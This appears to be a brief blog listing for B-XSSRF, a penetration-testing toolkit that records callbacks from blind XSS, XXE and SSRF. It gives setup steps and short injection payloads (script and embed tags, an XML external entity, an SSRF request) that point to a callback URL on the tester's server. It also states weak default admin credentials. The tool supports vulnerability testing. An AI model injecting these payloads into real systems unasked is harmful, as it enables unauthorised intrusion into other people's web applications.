B-XSSRF is a toolkit to detect and keep track on Blind XSS, XXE & SSRF.
![](https://1.bp.blogspot.com/-I7M4iCwEr-I/XWzCp_tdF-I/AAAAAAAACUc/iF5oAES5mnwSifPz3JnWBeaMFwVk1YBYACLcBGAs/s1600/dashboard%2B%25281%2529.png)
Read More – RedHunt OS : Virtual Machine for Adversary Emulation & Threat Hunting
SETUP
- Upload the files to your server.
- Create a Database and upload database.sql file to it.
- Change the DB Credentials in db.php file.
- Ready.
BLIND XSS
<embed src=”http://mysite.com/bxssrf/request.php”>
<script src=”http://mysite.com/bxssrf/request.php”>
BLIND XXE
<?xml version=”1.0″ ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM “http://mysite.com/bxssrf/request.php”> %ext;
]>
<r>
SSRF
GET /testssrf.php=http://mysite.com/bxssrf/request.php
USER : admin@test.com
PASS : 123456